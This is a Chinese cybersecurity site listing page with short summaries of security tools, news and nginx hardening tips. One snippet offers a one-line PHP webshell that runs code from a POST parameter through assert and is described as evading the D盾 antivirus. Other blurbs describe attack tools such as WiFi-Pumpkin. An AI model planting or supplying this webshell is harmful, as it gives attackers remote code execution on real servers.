网络安全

SpiderCrackDemo是一个爬虫技术Demo项目，存放了一些关于爬虫的研究Demo的分享，含【爬虫】【数据解密】【内容解析】【自动登陆】【反爬处理】大众点评 | 淘宝 | 京东 | 美团 | 天眼查 | 51Job | github | token...

前几天给的那个已经进套餐，今天再扔个免杀过D盾的 <?php function today($a, $b) { array_map($a, $b); } today(assert, array($_POST['x'])); ?>

近日Palo Alto公告，计划在其第四财季以4.1亿美元收购Twistlock。Twistlock对于国内用户而言，如果没有特意关注过RSA大会，云安全，容器安全，云原生安全或云工作负载保护平台等相关主题的话，可能不是很熟悉，...

AndroidHttpCapture网络诊断工具 AndroidHttpCapture是一款针对于移动流量劫持而开发的手机抓包软件，可以当作是Android版的Fiddler，主要功能包括：手机端抓包，PING/DNS/TraceRoute诊断、抓包HAR数据上传分...

this channel is blocked because it was used to spread pornographic content.“此频道被屏蔽，因为它用于传播色情内容。” 因为 App Store 的内容审核政策，Telegram 苹果系列设备 (iPhone/iPad/iMac/Macboo...

WiFi-Pumpkin介绍 WiFi-Pumpkin是一款无线Wi-Fi接入点攻击框架，可以轻松创建虚假网络，同时转发与不知情目标之间的合法流量。它有各种功能，包括恶意Wi-Fi接入点，客户端AP上的deauth攻击，探测请求和凭据监...

APubPlat APubPlat是一款开源免费的自动化部署、运维平台，开源堡垒机。 实现了Web界面话的Terminal，可替换xshell等工具。可开启多窗口和批量命令的运行。 友好的持续集成，支持web前端、node、java、...

XSStrike 高级XSS检测套件 XSStrike是一个XSS脚本探测套件，配备了4个手写解析器，一个智能payloads生成器，一个强大的引擎和一个令人难以置信的快速爬虫工具。和xwaf有相似之处，但又有明显的区别。 ...

隐藏版本号 http { server_tokens off; } 经常会有针对某个版本的nginx安全漏洞出现，隐藏nginx版本号就成了主要的安全优化手段之一，当然最重要的是及时升级修复漏洞 开启HTTPS server { listen...